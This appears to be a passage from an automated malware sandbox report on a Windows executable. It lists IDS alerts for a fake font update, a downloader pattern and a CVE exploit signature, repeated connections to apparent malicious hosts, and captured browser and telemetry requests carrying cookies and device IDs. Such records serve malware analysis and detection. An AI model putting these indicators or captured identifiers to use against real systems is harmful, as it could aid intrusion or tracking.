Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50134 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50146 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50145 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50131 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50150 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50152 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50153 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50160 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50155 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50162 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50157 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50164 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50173 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50175 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50176 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50171 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50180 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50178 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50184 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50181 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49761
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:50119

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C76CC60 PR_Recv,

0_2_6C76CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xM6bluABF+SGvfF&MD=9wAFnYdP HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1731317601820&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=18874E57A98C67C518B55B63A89566FE&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b2?rn=1731317601820&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=18874E57A98C67C518B55B63A89566FE&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=19F5b901c638ba8b0e63b9f1731317602; XID=19F5b901c638ba8b0e63b9f1731317602
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=18874E57A98C67C518B55B63A89566FE&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=80a034c22b5c4399f72cc08494ff6e32 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731922400&P2=404&P3=2&P4=fEdZybqmv55z90yFNuAxGl%2fHxJ12fYMM0nJgasQZB7mtpHA5D2vpo1XiMFHk%2bPAeOMPQzgOzRNCH9U7zHIsTjg%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: Vd7dXxmYq58VAfMJ+gUGCzSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msFQv.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1731317601819&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cab479153b874b3da039ff0032aa1e4d&activityId=cab479153b874b3da039ff0032aa1e4d&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=273F2475F82C4386958D625ABD0712E0&MUID=18874E57A98C67C518B55B63A89566FE HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
